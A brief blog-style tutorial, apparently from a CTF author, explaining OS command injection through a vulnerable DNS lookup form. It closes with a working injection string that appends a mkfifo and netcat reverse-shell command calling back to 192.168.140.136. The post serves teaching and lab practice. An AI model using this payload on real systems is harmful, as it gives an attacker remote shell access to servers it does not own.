OS command injection is a technique used via a web interface in order to execute OS commands on a web server. The user supplies operating system commands through a web interface in order to execute OS commands. Any web interface that is not properly sanitized is subject to this exploit. With the ability to execute OS commands, the user can upload malicious programs or even obtain passwords. OS command injection is preventable when security is emphasized during the design and development of applications.
As you can see this is DNS lookup but, it has OS Command injection vulnerability using which we can execute system command.
We can even get the reverse shell out of it.
www.nsa.gov && rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.140.136 4455 >/tmp/f
Twitter / Hack The Box / CTF Team / Teck_N00bs Community Telegram
Comments